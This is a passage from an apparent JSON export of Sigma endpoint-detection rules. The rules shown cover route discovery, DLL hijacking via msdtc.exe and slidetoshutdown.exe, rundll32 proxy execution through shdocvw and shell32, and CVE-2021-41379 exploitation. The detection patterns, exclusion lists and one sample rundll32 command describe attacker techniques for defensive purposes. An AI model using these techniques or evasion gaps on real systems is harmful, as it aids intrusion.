/usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n exclusion_openconnect:\n ParentCommandLine: '/bin/sh /usr/share/vpnc-scripts/vpnc-script'\n\n exclusion_glpi:\n GrandparentCommandLine:\n - 'glpi-agent: waiting'\n - 'glpi-agent (tag *): *'\n - '/usr/bin/perl /usr/bin/glpi-agent *'\n\n exclusion_cloudinit:\n ParentCommandLine|startswith: '/usr/bin/python3 /usr/bin/cloud-init '\n\n exclusion_fsecure:\n - ProcessParentCommandLine|startswith: '/bin/bash /opt/f-secure/'\n - ProcessGrandparentCommandLine|startswith: '/bin/bash /opt/f-secure/'\n\n exclusion_google_network_daemon:\n - ProcessParentCommandLine: '/usr/bin/python3 /usr/bin/google_network_daemon'\n - ProcessParentImage: '/usr/lib/google/guest_agent/core_plugin'\n\n exclusion_blueway:\n # /opt/blueway/bw_installeur/blueway-platform_linux_7.0.1-7/vendors/linux/ruby/bin/ruby\n ProcessParentImage: '/opt/blueway/bw_installeur/blueway-platform_linux_*/vendors/linux/ruby/bin/ruby'\n ProcessGrandparentCommandLine|contains: '/install_bw.sh'\n\n exclusion_alertmanager:\n ParentImage: '/usr/local/bin/alertmanager-*'\n\n exclusion_hv_kvp_daemon:\n GrandparentImage: '/usr/lib/linux-tools-*/hv_kvp_daemon'\n\n exclusion_shadow:\n GrandparentImage: '/usr/share/shadow-prod/shadow-launcher'\n\n exclusion_agarik:\n ParentImage: '/opt/agarik/vision/bin/vision_client'\n\n exclusion_paloalto:\n - ParentImage: '/opt/paloaltonetworks/globalprotect/PanGPS'\n - GrandparentImage: '/opt/paloaltonetworks/globalprotect/PanGPS'\n\n exclusion_glpi_agent:\n ProcessGrandparentCommandLine: '/usr/bin/perl /usr/bin/glpi-agent'\n\n exclusion_bettercap:\n ParentCommandLine|startswith: '/tmp/bettercap '\n\n exclusion_softtap:\n - ProcessParentCommandLine|startswith: '/bin/bash /usr/sbin/softtap '\n - ProcessGrandparentCommandLine|contains: 'softtap'\n\n exclusion_zscaler:\n GrandparentImage:\n - '/opt/zscaler/bin/zsaservice'\n - '/opt/zscaler/bin/zstunnel'\n\n exclusion_mk_agent:\n CurrentDirectory: '/usr/lib/check_mk_agent/plugins/'\n\n exclusion_tanium:\n ProcessParentCommandLine|startswith: '/bin/bash /opt/tanium/taniumclient/vb/tempunix_'\n\n exclusion_prom_alert:\n ProcessGrandparentImage|contains:\n - '/opt/prom_alert/muse/alertmanager/bin/alert-muse'\n - '/opt/prom_alert/mim/alertmanager/bin/alert-mim'\n - '/opt/prom_alert/mam/alertmanager/bin/alert-mam'\n\n exclusion_domotz:\n ProcessParentImage: '/opt/domotz/bin/domotz_node'\n\n exclusion_ceph:\n ProcessParentCommandLine: '*bin/python* /var/lib/ceph/* list-networks'\n\n exclusion_run-parts:\n ProcessParentImage: '/usr/bin/run-parts'\n\n exclusion_sysconfig:\n ProcessParentCommandLine|startswith: '/bin/sh /etc/sysconfig/network-scripts/'\n\n exclusion_nagios:\n ProcessAncestors|contains: '|/opt/nagiosagent/*/perl/bin/perl|'\n\n exclusion_bladelogic:\n - ProcessImage: '/opt/bladelogic/*/bin/rscd_full'\n - ProcessParentImage: '/opt/bladelogic/*/bin/rscd_full'\n - ProcessAncestors|contains: '|/opt/bladelogic/*/bin/rscd_full|'\n\n exclusion_bmc:\n ProcessAncestors|contains: '|/opt/bmc/bladelogic/RSCD/sbin/bldeploy|'\n\n exclusion_containerd:\n ProcessAncestors|contains:\n - '|/usr/bin/containerd-shim|'\n - '|/usr/bin/containerd-shim-runc-v2|'\n\n exclusion_manageengine:\n - ProcessParentImage:\n - '/usr/local/manageengine/uems_agent/bin/dcservice'\n - '/usr/local/manageengine/uems_agent/bin/dcconfig'\n - '/usr/local/manageengine/uems_agent/bin/dcagentupgrader'\n - ProcessGrandparentImage:\n - '/usr/local/manageengine/uems_agent/bin/dcservice'\n - '/usr/local/manageengine/uems_agent/bin/dcconfig'\n - '/usr/local/manageengine/uems_agent/bin/dcagentupgrader'\n\n exclusion_patchmon:\n ProcessParentImage: '/usr/local/bin/patchmon-agent'\n\n exclusion_anydesk:\n ProcessGrandparentImage: '/usr/bin/anydesk'\n\n exclusion_expressvpn:\n ProcessParentImage: '/usr/sbin/expressvpnd'\n\n exclusion_dispatcher:\n ProcessAncestors|contains: '|/usr/libexec/nm-dispatcher|'\n\n exclusion_waagent:\n ProcessCommandLine|startswith: '/usr/bin/python* /usr/sbin/waagent'\n\n exclusion_nutanix:\n ProcessParentCommandLine|startswith: '/bin/sh /opt/era_base/era_priv_cmd.sh'\n\n exclusion_ruptime:\n ProcessParentCommandLine|startswith: '/bin/bash /usr/bin/rnet '\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b7865333-71e3-4f99-be6c-df2db775b39d",
"rule_name": "IP Route Execution",
"rule_description": "Detects the execution of the IP route utility to display the routing table management.\nAttackers may use it during discovery phase to discover remote systems.\nIt is recommended to investigate other actions taken by this user in their session.\n",
"rule_creation_date": "2022-12-23",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1018"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b7d32df3-4512-4ec4-b585-77b3563e8764",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.097667Z",
"creation_date": "2026-03-23T11:45:34.097670Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097674Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf",
"https://unit42.paloaltonetworks.com/dll-hijacking-techniques/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_phantom_dll_hijacking_mstdc.yml",
"content": "title: Phantom DLL Hijacking via msdtc.exe\nid: b7d32df3-4512-4ec4-b585-77b3563e8764\ndescription: |\n Detects a potential Windows DLL search order hijacking via msdtc.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf\n - https://unit42.paloaltonetworks.com/dll-hijacking-techniques/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2024/03/05\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'MSDTC.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded: '?:\\Windows\\System32\\oci.dll'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n\n exclusion_oracle:\n # 51fcd4dad018f86274954ed4e814873b9d149e246278512a9033daefca6113aa\n # a7cda77708394f261cd7e6b9072928dfce5fb9985e7a4071ba24fa59fe537ba6 (trailing \\n at the end of Description in that one...)\n Company: 'Oracle Corporation'\n Description: 'Oracle Call Interface*'\n OriginalFileName:\n - 'Oci.dll'\n - 'oci19.dll'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b7d32df3-4512-4ec4-b585-77b3563e8764",
"rule_name": "Phantom DLL Hijacking via msdtc.exe",
"rule_description": "Detects a potential Windows DLL search order hijacking via msdtc.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2024-03-05",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b7e83940-efa3-49f7-9ff6-2e3ebcd998bd",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.589073Z",
"creation_date": "2026-03-23T11:45:34.589077Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.589085Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_slidetoshutdown.yml",
"content": "title: DLL Hijacking via slidetoshutdown.exe\nid: b7e83940-efa3-49f7-9ff6-2e3ebcd998bd\ndescription: |\n Detects potential Windows DLL Hijacking via slidetoshutdown.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'slidetoshutdown.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\d3d10warp.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b7e83940-efa3-49f7-9ff6-2e3ebcd998bd",
"rule_name": "DLL Hijacking via slidetoshutdown.exe",
"rule_description": "Detects potential Windows DLL Hijacking via slidetoshutdown.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b8062e3d-4666-40ab-a25b-b63ae6634ee6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072416Z",
"creation_date": "2026-03-23T11:45:34.072418Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072422Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Libraries/Shdocvw/",
"https://attack.mitre.org/techniques/T1218/011/"
],
"name": "t1218_011_rundll32_shdocvw.yml",
"content": "title: Proxy Execution via Shdocvw.dll\nid: b8062e3d-4666-40ab-a25b-b63ae6634ee6\ndescription: |\n Detects a suspicious invocation of Shdocvw.dll by rundll32.\n Adversaries may abuse rundll32.exe to proxy execution of malicious code.\n Using rundll32.exe, vice executing directly (i.e. Shared Modules), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations.\n It is recommended to check the content of the target file or URL used with the OpenURL argument and child processes of rundll32 to look for malicious content or actions.\nreferences:\n - https://lolbas-project.github.io/lolbas/Libraries/Shdocvw/\n - https://attack.mitre.org/techniques/T1218/011/\ndate: 2022/12/02\nmodified: 2025/01/29\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.011\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Shdocvw\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # rundll32.exe shdocvw.dll,OpenURL \"C:\\test\\calc.url\"\n selection_bin:\n - Image|endswith: '\\rundll32.exe'\n - OriginalFileName: 'RUNDLL32.EXE'\n\n selection_cmd1:\n CommandLine|contains: ' shdocvw'\n\n selection_cmd2:\n CommandLine|contains:\n - 'OpenURL'\n - '#154' # OpenURL\n\n condition: all of selection_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b8062e3d-4666-40ab-a25b-b63ae6634ee6",
"rule_name": "Proxy Execution via Shdocvw.dll",
"rule_description": "Detects a suspicious invocation of Shdocvw.dll by rundll32.\nAdversaries may abuse rundll32.exe to proxy execution of malicious code.\nUsing rundll32.exe, vice executing directly (i.e. Shared Modules), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations.\nIt is recommended to check the content of the target file or URL used with the OpenURL argument and child processes of rundll32 to look for malicious content or actions.\n",
"rule_creation_date": "2022-12-02",
"rule_modified_date": "2025-01-29",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218.011"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b8077321-e5f1-471d-bdc3-450e9886b68f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.624994Z",
"creation_date": "2026-03-23T11:45:34.624996Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.625000Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41379",
"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41379",
"https://github.com/klinix5/InstallerFileTakeOver"
],
"name": "cve_2021_41379_edgesvc.yml",
"content": "title: Edge Updater CVE-2021-41379 Vulnerability Exploited\nid: b8077321-e5f1-471d-bdc3-450e9886b68f\ndescription: |\n Detects the possible exploitation of CVE-2021-41379 on Microsoft Edge Updater.\n This vulnerability exists within the Windows Installer service and can be abused by an attacker to escalate privileges and execute arbitrary code in the context of SYSTEM.\n All unpatched versions of Windows are affected and a proof-of-concept is available publicly.\n It is reocmmended to analyze the process execution by the Edge Updater binary to determine its legitimacy and to look for other suspicious actions on the host.\nreferences:\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41379\n - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41379\n - https://github.com/klinix5/InstallerFileTakeOver\ndate: 2021/11/25\nmodified: 2025/12/17\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.002\n - attack.privilege_escalation\n - attack.t1068\n - cve.2021-41379\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Exploit.EdgeUpdater\n - classification.Windows.Exploit.CVE-2021-41379\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n # C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\95.0.1020.44\\elevation_service.exe\n Image: '?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\\\*\\elevation_service.exe'\n # If we cannot read info about the file, we can't verify the signature\n ProcessSha256|contains: '?'\n\n filter_signed:\n - Signed: 'true'\n - Signed: 'false'\n OriginalFileName:\n - 'elevation_service'\n - 'elevation_service.exe'\n Company: 'Microsoft Corporation'\n\n condition: selection and not 1 of filter_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b8077321-e5f1-471d-bdc3-450e9886b68f",
"rule_name": "Edge Updater CVE-2021-41379 Vulnerability Exploited",
"rule_description": "Detects the possible exploitation of CVE-2021-41379 on Microsoft Edge Updater.\nThis vulnerability exists within the Windows Installer service and can be abused by an attacker to escalate privileges and execute arbitrary code in the context of SYSTEM.\nAll unpatched versions of Windows are affected and a proof-of-concept is available publicly.\nIt is reocmmended to analyze the process execution by the Edge Updater binary to determine its legitimacy and to look for other suspicious actions on the host.\n",
"rule_creation_date": "2021-11-25",
"rule_modified_date": "2025-12-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1068",
"attack.t1204.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b8709f31-37a7-4b65-857d-2588fb275282",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.628641Z",
"creation_date": "2026-03-23T11:45:34.628643Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.628647Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Libraries/Shell32/",
"https://attack.mitre.org/techniques/T1218/011/"
],
"name": "t1218_011_shell32.yml",
"content": "title: Proxy Execution via Shell32\nid: b8709f31-37a7-4b65-857d-2588fb275282\ndescription: |\n Detects the execution of the legitimate Windows DLL Shell32.dll using parameters allowing for proxy execution.\n This binary can be used as a lolbin in order to execute binaries or load DLLs.\n It is recommended to investigate the process responsible for the execution of Shell32 as well as the executed payload to look for malicious content or actions.\nreferences:\n - https://lolbas-project.github.io/lolbas/Libraries/Shell32/\n - https://attack.mitre.org/techniques/T1218/011/\ndate: 2022/12/15\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.011\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Shell32\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_rundll:\n - Image|endswith: '\\rundll32.exe'\n - OriginalFileName: 'rundll32.exe'\n\n selection_shell32:\n CommandLine|contains|all:\n - 'shell32'\n - ','\n\n selection_args:\n CommandLine|contains:\n - 'Control_RunDLL'\n - 'ShellExec_RunDLL'\n\n # This is handled in the rule 0cd0225c-b3cf-4b13-b578-75c10f83bbb5\n filter_suspicious:\n CommandLine|contains:\n - '\\AppData\\'\n - '\\Temp\\'\n - '%AppData%'\n - '%LocalAppData%'\n - '%Temp%'\n - '?:\\Users\\Public'\n - '?:\\PerfLogs\\'\n\n # This is handled in the rule bab5e737-6c2c-4c7b-91d5-2de4b89836fb\n filter_control:\n ParentImage: '?:\\Windows\\System32\\control.exe'\n\n exclusion_programfiles:\n ParentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_legitimate:\n CommandLine|contains:\n - '@screensaver'\n - 'mmsys.cpl,,playback'\n - 'mmsys.cpl,,sounds'\n - 'mmsys.cpl,,recording'\n - 'mmsys.cpl,,{0.0.0.00000000}'\n - '?:\\Windows\\system32\\\\*.cpl'\n - '?:\\windows\\CCM\\\\*.cpl'\n - '\\Office??\\MLCFG32.CPL'\n - 'PowerCfg.cpl @0,/editplan:'\n - 'input.dll,,{C07337D3-DB2C-4D0B-9A93-B722A6C106E2}'\n - 'inetcpl.cpl,,0'\n - 'Control_RunDLL desk.cpl,'\n - 'sysdm.cpl,,1'\n - 'Control_RunDLL timedate.cpl'\n - 'Control_RunDLL nusrmgr.cpl'\n - 'Control_RunDLL srchadmin.dll'\n - 'Control_RunDLL ?:\\WINDOWS\\System32\\srchadmin.dll'\n - 'Control_RunDLL appwiz.cpl,'\n - 'Control_RunDLL bthprops.cpl,'\n - 'Control_RunDLL cscui.dll'\n - 'Control_RunDLL ?:\\WINDOWS\\system32\\cscui.dll'\n - 'Control_RunDLL userpassowrds2'\n - 'Control_RunDLL ?:\\windows\\system32\\keymgr.dll'\n - 'Control_RunDLL mmsys.cpl,,'\n\n exclusion_netplwiz:\n CommandLine|contains: 'shell32.dll,Control_RunDLL keymgr.dll'\n ParentImage: '?:\\Windows\\System32\\Netplwiz.exe'\n\n exclusion_oracle:\n CommandLine|startswith: 'runDll32.exe shell32.dll,ShellExec_RunDLL ?:\\tmp\\'\n ParentImage|endswith: '\\Oracle\\BIN\\ifrun60.EXE'\n\n exclusion_cpage:\n ParentImage: '?:\\Program Files (x86)\\CWS\\cpage-launcher\\bin\\CPageExec32.exe'\n\n exclusion_jp2launcher:\n CommandLine: 'rundll32 SHELL32.dll,ShellExec_RunDLL *.pdf'\n ParentImage|endswith: '\\bin\\jp2launcher.exe'\n\n exclusion_jaspersoft:\n CommandLine|startswith: 'rundll32 SHELL32.dll,ShellExec_RunDLL '\n ParentCommandLine|contains|all:\n - '\\bin\\java.exe -Xms'\n - '\\Jaspersoft\\iReport-'\n\n exclusion_java:\n CommandLine: 'rundll32 SHELL32.dll,ShellExec_RunDLL *.pdf'\n ParentImage|endswith: '\\bin\\java.exe'\n ParentCommandLine|contains: ' -Xms'\n\n exclusion_input:\n CommandLine:\n - '?:\\WINDOWS\\system32\\rundll32.exe Shell32.dll,Control_RunDLL input.dll'\n - 'RunDll32.exe shell32.dll,Control_RunDLL ?:\\Windows\\system32\\input.dll'\n ParentCommandLine:\n - '?:\\WINDOWS\\system32\\control.exe input.dll'\n - 'ctfmon.exe'\n\n exclusion_onedrive1:\n CommandLine|startswith: '?:\\Windows\\System32\\rundll32.exe shell32.dll, ShellExec_RunDLL ?:\\Users\\'\n ParentCommandLine:\n - '?:\\Program Files\\Microsoft OneDrive\\OneDrive.exe'\n - '?:\\Program Files\\Microsoft OneDrive\\OneDrive.exe /background'\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe /url:odopen:*'\n - '?:\\Program Files (x86)\\Microsoft OneDrive\\OneDrive.exe /url:odopen:*'\n - '?:\\Program Files\\Microsoft OneDrive\\OneDrive.exe /url:odopen:*'\n - '/updateInstalled /background'\n exclusion_onedrive2:\n CommandLine|startswith: '?:\\Windows\\System32\\rundll32.exe shell32.dll, ShellExec_RunDLL ?:\\Users\\'\n ProcessParentOriginalFileName: 'OneDrive.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Microsoft Corporation'\n\n exclusion_xmind:\n ParentImage: '?:\\Program Files (x86)\\XMind\\XMind.exe'\n\n exclusion_sihost:\n CommandLine: '?:\\WINDOWS\\system32\\rundll32.exe shell32.dll,Control_RunDLL'\n ParentImage: '?:\\Windows\\System32\\sihost.exe'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b8709f31-37a7-4b65-857d-2588fb275282",
"rule_name": "Proxy Execution via Shell32",
"rule_description": "Detects the execution of the legitimate Windows DLL Shell32.dll using parameters allowing for proxy execution.\nThis binary can be used as a lolbin in order to execute binaries or load DLLs.\nIt is recommended to investigate the process responsible for the execution of Shell32 as well as the executed payload to look for malicious content or actions.\n",
"rule_creation_date": "2022-12-15",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218.011"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
